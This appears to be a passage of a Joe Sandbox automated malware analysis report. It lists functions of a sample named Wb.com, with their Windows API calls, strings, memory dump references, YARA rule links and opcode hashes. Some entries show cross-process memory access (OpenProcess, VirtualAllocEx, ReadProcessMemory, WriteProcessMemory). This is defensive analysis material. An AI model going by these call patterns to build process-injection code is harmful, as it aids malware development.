                                                                                                                                                                                                                                                                                                        Function 00FE12B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: __freea$_free
                                                                                                                                                                                                                                                                                                        • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                                        • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                                        • Opcode ID: c9e29229799c36b92bae73a636452890d3bb16ce4705a840d3558195e4cfbc6f
                                                                                                                                                                                                                                                                                                        • Instruction ID: d86e97273b416c0c3c06e5c54ed8c56ca7a47aa69771cf478e8ccbfc7bfd73f5
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9e29229799c36b92bae73a636452890d3bb16ce4705a840d3558195e4cfbc6f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63D11672D00286DBCB249F6BC8557FAB7B1FF45720F2C415AE9029B290D7359D80EB91
                                                                                                                                                                                                                                                                                                        Function 01013063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,01012B1D,?,?,00000034,00000800,?,00000034), ref: 0101BDF4
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 010130AD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,01012B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0101BDBF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0101BD1C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,01012AE1,00000034,?,?,00001004,00000000,00000000), ref: 0101BD2C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,01012AE1,00000034,?,?,00001004,00000000,00000000), ref: 0101BD42
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0101311A
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 01013167
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                                        • Opcode ID: 16729244ce430dd35ab61f7eb0331e92b1af227804fb4983e1bb1abf6be3b63a
                                                                                                                                                                                                                                                                                                        • Instruction ID: bcce75a00d06fa01491b516c9c777062649d219bb49f433b03503e621650f6f3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16729244ce430dd35ab61f7eb0331e92b1af227804fb4983e1bb1abf6be3b63a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88415C76900218BFDB10DBA8CD81AEEBBB8FF55310F004095EA85BB184DB746E84CB61
                                                                                                                                                                                                                                                                                                        Function 00FE1A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\623615\Wb.com,00000104), ref: 00FE1AD9
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE1BA4
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE1BAE
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                        • API String ID: 2506810119-2976804977
                                                                                                                                                                                                                                                                                                        • Opcode ID: c19f5074a40563c79ecfa2d881f1996f6d360bd379ce918259018e5a219f56f1
                                                                                                                                                                                                                                                                                                        • Instruction ID: d5ade976ab02106bbaad350e55cdcce0f10df3a2fcc9e9d6accc00005127d147
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c19f5074a40563c79ecfa2d881f1996f6d360bd379ce918259018e5a219f56f1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF315E71E04298ABCB31DF9BDC85D9EBBFCFB84720B1441A6E84497211E6748A40EB90
                                                                                                                                                                                                                                                                                                        Function 0101CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0101CBB1
                                                                                                                                                                                                                                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0101CBF7
                                                                                                                                                                                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,010829C0,018E5C60), ref: 0101CC40
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: dd5a8495854430c6689b96b8fd7d648272fa6b16bc747f992afd51b4e2f0688d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9a765ffc86fe6bf7271d37f74e4cc5e766fe3307139fc8d086802f01625237db
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd5a8495854430c6689b96b8fd7d648272fa6b16bc747f992afd51b4e2f0688d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A41C1712443069FE720DF28DA84B5ABBE8BF84B14F04465DE5E597385CB38E904CB52
                                                                                                                                                                                                                                                                                                        Function 01044EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0104DCD0,00000000,?,?,?,?), ref: 01044F48
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32 ref: 01044F65
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01044F75
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Long
                                                                                                                                                                                                                                                                                                        • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                        • Opcode ID: f2ca3e1c653f613492d6b1cb1a817cd1fa03974a5b71b7b06a247f176f0eb6d3
                                                                                                                                                                                                                                                                                                        • Instruction ID: ece9df451e3d4502f68c88e299df80c21edbf75c97b56bba3a915ce9cab8b4af
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2ca3e1c653f613492d6b1cb1a817cd1fa03974a5b71b7b06a247f176f0eb6d3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A431C0B1214205AFEB618E78DC85BEA7BA9EF08334F204725F9B9E21D1D774E8509B50
                                                                                                                                                                                                                                                                                                        Function 01033AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01033DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,01033AD4,?,?), ref: 01033DD5
                                                                                                                                                                                                                                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 01033AD7
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01033AF8
                                                                                                                                                                                                                                                                                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 01033B63
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                                        • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3e946849bb7d443fa80023fc37582ccc087341688fb0468ebc9e2cbd4bf7c578
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9655ed33a9259e90eb3bd74b69241a87ba1ea67d678c56754747ecb0e041a759
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e946849bb7d443fa80023fc37582ccc087341688fb0468ebc9e2cbd4bf7c578
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A31E4392002019FDB14CF6DC5C5EAA7BE8FF94314F148199EA968F392C735E941C760
                                                                                                                                                                                                                                                                                                        Function 01044954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 010449DC
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 010449F0
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 01044A14
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                                        • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                                        • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                                        • Opcode ID: cb2fed1250819c1466b7aed033a14248dea93f88d7fd8be78cd9724ec4057d51
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5f6a43e383ff947d5f27ce71629cc65c2d98edb6b4a50499ea9d2aac0f336d09
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb2fed1250819c1466b7aed033a14248dea93f88d7fd8be78cd9724ec4057d51
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA21F172610219BBDF22CE94CC82FEE3BA9FF48714F110214FA95AB1D0D6B5E855DB90
                                                                                                                                                                                                                                                                                                        Function 010450F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 010451A3
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 010451B1
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010451B8
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                                        • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                                        • Opcode ID: 41b7c24d522293e991cee2bd230c3d6f3ba911110aac82a9a3f1e956eb385713
                                                                                                                                                                                                                                                                                                        • Instruction ID: 18350f065c7eec12922f86ce839e73ac17855d78bbdf3e63f35a04fc7a6bbe75
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41b7c24d522293e991cee2bd230c3d6f3ba911110aac82a9a3f1e956eb385713
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E215EB5600209AFDB11DF58CCC1DAB37EDEF593A4B040059FA809B361CA75EC11DBA0
                                                                                                                                                                                                                                                                                                        Function 01044253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 010442DC
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 010442EC
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01044312
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                        • String ID: Listbox
                                                                                                                                                                                                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                        • Opcode ID: 85d5fee80ffd561041ca63abae4d6583e1e283f40d01baccb4b5b1b4c527b8f8
                                                                                                                                                                                                                                                                                                        • Instruction ID: 643b3f74358a0a46dac637b65db9a43661fdcf239ebe2d249f93c625a12bec2c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85d5fee80ffd561041ca63abae4d6583e1e283f40d01baccb4b5b1b4c527b8f8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E421C2B2610218BBEF128E94CCC4FAF3BAEEF89754F518124F9809B191C6759C5187A0
                                                                                                                                                                                                                                                                                                        Function 01025439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0102544D
                                                                                                                                                                                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 010254A1
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,0104DCD0), ref: 01025515
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                        • String ID: %lu
                                                                                                                                                                                                                                                                                                        • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                                        • Opcode ID: 74310471ef943ff82bde778a7f2d5730abee1efcbf724603141b6118fa93a664
                                                                                                                                                                                                                                                                                                        • Instruction ID: d1820c498d8279462d99c682312aaa6995d6f20c22814030902fe4f93fd29742
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74310471ef943ff82bde778a7f2d5730abee1efcbf724603141b6118fa93a664
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4318174A00109AFD710DF54C984EAABBF8EF08308F1440A8F949DB262DB75EE45DB61
                                                                                                                                                                                                                                                                                                        Function 01044C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01044CED
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01044D02
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01044D0F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                        • Opcode ID: fe6d9f027596c12ab782e427c53f7aef008564440a65a6b1da56ebb9d5b2c242
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4ceefca7498e38e3590c14db4a89c2df9bb7bc4509b69cbcfb47167254e6fee3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe6d9f027596c12ab782e427c53f7aef008564440a65a6b1da56ebb9d5b2c242
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA11E3B1240248BFEF216E69CC46FAB3BE8EF85B64F110525FA91E6090D271D8509B14
                                                                                                                                                                                                                                                                                                        Function 0101389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
